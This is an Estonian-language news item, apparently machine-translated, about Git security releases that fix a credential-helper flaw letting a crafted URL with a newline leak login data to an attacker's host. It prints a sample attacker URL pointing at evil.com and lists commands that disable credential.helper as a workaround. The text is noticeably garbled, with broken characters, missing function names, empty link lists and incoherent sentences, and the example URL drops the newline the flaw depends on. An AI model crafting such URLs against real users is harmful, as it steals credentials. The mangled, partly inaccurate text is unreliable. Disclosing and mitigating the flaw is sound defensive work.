korrektuurivĂ€ljaanded jaotatud lĂ€htekoodihalduse sĂŒsteemis Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 ja 2.17.4, milles on kĂ”rvaldatud () töötlejas â«, mis toob kaasa autentimisandmete saatmise valele hostile, kui git-klient pöördub hoidla poole erikujundatud URL-i kaudu, mis sisaldab reavahetusmĂ€rki. RĂŒndaja kontrolli all oleva serveri suunas saadud autentimisandmeid on vĂ”imalik kasutada.
Kui URL on kujul «https://evil.com?host=github.com/», siis edastab evil.com'i majutaja autentimisparameetrid, mis on mÀÀratud github.com'ile. Probleem ilmneb selliste toimingute kĂ€igus nagu «git clone», sealhulgas alamoodulite URL-ide töötlemisel (nĂ€iteks «git submodule update» kĂ€itamisel töödeldakse automaatselt URL-e, mis on mÀÀratud .gitmodules failis repositooriumist). See haavatavus on kĂ”ige ohtlikum olukordades, kus arendaja kloneerib repositooriumi URL-i nĂ€gemata, nĂ€iteks alamoodulitega töötamisel vĂ”i automaatsete toimingute sĂŒsteemides, nĂ€iteks pakettide ehitusskriptides.
Uue versiooni vÀljaandmiseks reavahetusmÀrgi edastamine igasugustes vÀÀrtustes, mis edastatakse autentimisprotokollide kaudu. Pakettide vÀrskenduste vÀljaandmise jÀlgimiseks distributsioonide jaoks tutvuge lehtedega , , , , , , .
Probleemi lahendamiseks ei kasuta credential.helper'i avalikes hoidlates ja ei kasuta âgit cloneâ kĂ€sku reĆŸiimis âârecurse-submodulesâ kontrollimata hoidlate puhul. Credential.helper'i tĂ€ielikuks keelamiseks, mis teostab ja paroolide vĂ€ljaottmist , kaitstud vĂ”i paroolifailist, saab kasutada jĂ€rgmisi kĂ€sklusi:
git config âunset credential.helper
git config âglobal âunset credential.helper
git config âsystem âunset credential.helper
Allikas: opennet.ru
